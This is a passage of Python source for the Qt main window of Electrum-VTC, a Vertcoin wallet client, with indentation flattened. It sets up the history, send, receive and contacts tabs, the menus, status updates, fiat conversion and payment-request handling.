# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import socket
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import PyQt4
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import icons_rc
from electrum_vtc import keystore
from electrum_vtc.bitcoin import COIN, is_valid, TYPE_ADDRESS
from electrum_vtc.plugins import run_hook
from electrum_vtc.i18n import _
from electrum_vtc.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled)
from electrum_vtc import Transaction, mnemonic
from electrum_vtc import util, bitcoin, commands, coinchooser
from electrum_vtc import SimpleConfig, paymentrequest
from electrum_vtc.wallet import Wallet, Multisig_Wallet
try:
from electrum_vtc.plot import plot_history
except:
plot_history = None
from amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCkBEdit
from qrcodewidget import QRCodeWidget, QRDialog
from qrtextedit import ShowQRTextEdit
from transaction_dialog import show_transaction
from fee_slider import FeeSlider
from electrum_vtc import ELECTRUM_VERSION
import re
from util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt4 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == QtCore.Qt.Key_Return:
self.func()
from electrum_vtc.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum-vtc.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.connect(self, QtCore.SIGNAL('payment_request_ok'), self.payment_request_ok)
self.connect(self, QtCore.SIGNAL('payment_request_error'), self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.connect(self, QtCore.SIGNAL('network'), self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.connect(self, SIGNAL('new_fx_quotes'), self.on_fx_quotes)
self.connect(self, SIGNAL('new_fx_history'), self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.emit(SIGNAL('new_fx_history'))
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
def on_quotes(self, b):
self.emit(SIGNAL('new_fx_quotes'))
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.emit(QtCore.SIGNAL('updated'), event, *args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.emit(QtCore.SIGNAL('network'), event, *args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, *args):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.emit(SIGNAL('alias_received'))
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.mpk_menu.setEnabled(self.wallet.is_deterministic())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = 'Electrum-VTC %s - %s' % (self.wallet.electrum_version,
self.wallet.basename().decode('utf8'))
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend vertcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request vertcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename = unicode(QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder))
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename = unicode( QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) )
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error), reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
filename = filename.decode('utf8')
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k.encode('utf8'))
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.mpk_menu = wallet_menu.addAction(_("&Master Public Keys"), self.show_master_public_keys)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://vertcoin.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('vertcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-VTC",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Vertcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Vertcoin system."))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/vertcoin/electrum-vtc/issues\">https://github.com/vertcoin/electrum-vtc/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-VTC - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are more then three
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received. Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received. %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
self.tray.showMessage("Electrum-VTC", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
fileName = unicode( QFileDialog.getOpenFileName(self, title, directory, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
path = os.path.join( directory, filename )
fileName = unicode( QFileDialog.getSaveFileName(self, title, path, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
self.connect(sender, QtCore.SIGNAL('timersignal'), self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount)
if text and x:
text += ' (%s)'%x
return text
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mVTC'
if self.decimal_point == 8:
return 'VTC'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(BLACK_FG)
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(BLUE_FG)
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(BLUE_FG)
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename().decode('utf8')))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Vertcoin address where the payment should be received. Note that each payment request uses a different Vertcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems(map(lambda x:x[0], expiration_values))
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Vertcoin addresses.'),
_('The Vertcoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = req.get('sig').decode('hex')
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text())
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = map(lambda x: x[1], expiration_values)[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(str(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
from electrum_vtc.wallet import Imported_Wallet
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address()
if addr:
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text()).encode('utf8')
